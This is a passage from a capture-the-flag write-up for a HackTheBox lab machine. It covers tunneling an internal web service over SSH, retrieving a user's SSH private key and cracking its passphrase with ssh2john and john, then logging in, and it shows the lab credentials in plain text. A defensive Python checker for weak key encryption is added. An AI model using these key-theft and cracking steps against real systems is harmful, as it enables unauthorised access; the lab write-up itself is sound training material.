Joanna
In order to access the internal web server running on localhost:52846, I need to tunnel it out to expose it.
While there are many ways to tunnel an internal service, I will just use SSH.
SSH tunnel
┌──(kali㉿kali)-[~/archive/htb/labs/openadmin]
└─$ sshpass -pn1nj4W4rri0R! ssh -L 127.0.0.1:8888:127.0.0.1:52846 -N -f jimmy@$IP
SSH tunneling by binding the host's 127.0.0.1:8888 to the target's 127.0.0.1:52846.
I can now reach the target's 127.0.0.1:52846 via Kali's 127.0.0.1:8888.
This could also be done as a reverse tunnel from the target, but I don't want to hand the Kali password to the target host, so a local forward it is.
I can see the expected login page, /var/www/internal/index.php.
Providing the cracked password.
This must be the SSH private key for the joanna user.
I will grab this and SSH to the target host as the joanna user.
ssh2john
┌──(kali㉿kali)-[~/archive/htb/labs/openadmin]
└─$ ssh joanna@$IP -i id_rsa.joanna
Enter passphrase for key 'id_rsa.joanna':
joanna@10.10.10.171's password:
I can't just use the key as-is, since joanna's SSH private key is passphrase-protected.
I will have to crack the passphrase for the SSH private key. For this operation, I will use ssh2john.
┌──(kali㉿kali)-[~/archive/htb/labs/openadmin]
└─$ ssh2john id_rsa.joanna > id_rsa.joanna.john
This converts the SSH private key into a crackable hash file that john can work with.
┌──(kali㉿kali)-[~/archive/htb/labs/openadmin]
└─$ john id_rsa.joanna.john --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
bloodninjas (id_rsa.joanna.john)
1g 0:00:00:02 DONE (2022-10-11 18:55) 0.3906g/s 3740Kp/s 3740Kc/s 3740KC/s bloodofyouth..bloodmore23
Use the "--show" option to display all of the cracked passwords reliably
I can then just load the hash file in and have john crack the passphrase.
The passphrase for joanna's SSH private key is bloodninjas.
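The john cost lines above (KDF/cipher 0 = MD5/AES, iteration count 1) are why the crack finished in two seconds: the key is in legacy PEM format, where the passphrase is turned into the key with a single MD5 pass, so every wordlist guess costs almost nothing. As an added example, not part of the original writeup, here is a small Python checker a defender could run over a key directory to flag keys protected that weakly; it reads only the file headers, the sample key headers are constructed, and the thresholds in assess() are this example's own choice.

```python
import base64
import struct
OPENSSH_MAGIC = b"openssh-key-v1\x00"

def _read_string(buf, off):
    # one SSH wire-format string: uint32 big-endian length, then the bytes
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n

def inspect_private_key(pem: str) -> dict:
    """Report how a private key file is protected: format, cipher, KDF and KDF rounds."""
    lines = pem.strip().splitlines()
    if lines[0] == "-----BEGIN OPENSSH PRIVATE KEY-----":
        blob = base64.b64decode("".join(l for l in lines[1:] if not l.startswith("-----")))
        if not blob.startswith(OPENSSH_MAGIC):
            raise ValueError("not an openssh-key-v1 blob")
        off = len(OPENSSH_MAGIC)
        cipher, off = _read_string(blob, off)   # e.g. b"aes256-ctr", or b"none" if unencrypted
        kdf, off = _read_string(blob, off)      # b"bcrypt" or b"none"
        kdfopts, off = _read_string(blob, off)  # bcrypt: string salt + uint32 rounds
        rounds = 0
        if kdf == b"bcrypt":
            _salt, o = _read_string(kdfopts, 0)
            (rounds,) = struct.unpack(">I", kdfopts[o:o + 4])
        return {"format": "openssh", "cipher": cipher.decode(), "kdf": kdf.decode(),
                "rounds": rounds, "encrypted": cipher != b"none"}
    # Legacy PEM (BEGIN RSA/DSA/EC PRIVATE KEY): DEK-Info marks encryption, key derived by one MD5 pass
    dek = next((l for l in lines if l.startswith("DEK-Info:")), None)
    if dek is None:
        return {"format": "pem", "cipher": "none", "kdf": "none", "rounds": 0, "encrypted": False}
    cipher = dek.split(":", 1)[1].strip().split(",")[0]
    return {"format": "pem", "cipher": cipher, "kdf": "md5", "rounds": 1, "encrypted": True}

def assess(info: dict) -> str:
    # thresholds are this example's own choice, not an OpenSSH default
    if not info["encrypted"]:
        return "WEAK: no passphrase"
    if info["kdf"] != "bcrypt":
        return "WEAK: legacy MD5 KDF, passphrase guesses run at wordlist speed"
    if info["rounds"] < 16:
        return f"WEAK: bcrypt rounds={info['rounds']}, regenerate with ssh-keygen -a 16 or higher"
    return "OK"

# Constructed sample: legacy PEM header with a dummy IV; body omitted because only headers are read
SAMPLE_LEGACY = "-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\nDEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF\n\n-----END RSA PRIVATE KEY-----"

def make_openssh_header(cipher=b"aes256-ctr", kdf=b"bcrypt", rounds=16) -> str:
    # constructed openssh-key-v1 header only (no key material), enough for inspect_private_key()
    s = lambda b: struct.pack(">I", len(b)) + b
    kdfopts = s(b"\x00" * 16) + struct.pack(">I", rounds) if kdf == b"bcrypt" else b""
    blob = OPENSSH_MAGIC + s(cipher) + s(kdf) + s(kdfopts) + struct.pack(">I", 1)
    return "-----BEGIN OPENSSH PRIVATE KEY-----\n" + base64.b64encode(blob).decode() + "\n-----END OPENSSH PRIVATE KEY-----"
```

A key like the one cracked here would come back as the legacy MD5 case; regenerating it with ssh-keygen -o -a 16 (or converting with ssh-keygen -p -o) moves it to the bcrypt KDF that john reports as cost 2.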
SSH
┌──(kali㉿kali)-[~/archive/htb/labs/openadmin]
└─$ ssh joanna@$IP -i id_rsa.joanna
Enter passphrase for key 'id_rsa.joanna': bloodninjas
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu Jan 12 18:05:20 UTC 2023
System load: 0.0 Processes: 182
Usage of /: 33.3% of 7.81GB Users logged in: 1
Memory usage: 15% IP address for ens160: 10.10.10.171
Swap usage: 0%
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
39 packages can be updated.
11 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Tue Jul 27 06:12:07 2021 from 10.10.14.15
joanna@openadmin:~$ whoami
joanna
joanna@openadmin:~$ hostname
openadmin
joanna@openadmin:~$ ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.10.171 netmask 255.255.255.0 broadcast 10.10.10.255
inet6 fe80::250:56ff:feb9:a730 prefixlen 64 scopeid 0x20<link>
inet6 dead:beef::250:56ff:feb9:a730 prefixlen 64 scopeid 0x0<global>
ether 00:50:56:b9:a7:30 txqueuelen 1000 (Ethernet)
RX packets 1658754 bytes 309436221 (309.4 MB)
RX errors 0 dropped 100 overruns 0 frame 0
TX packets 1656666 bytes 768305943 (768.3 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 11470 bytes 900250 (900.2 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 11470 bytes 900250 (900.2 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
I am now on the target host as the joanna user.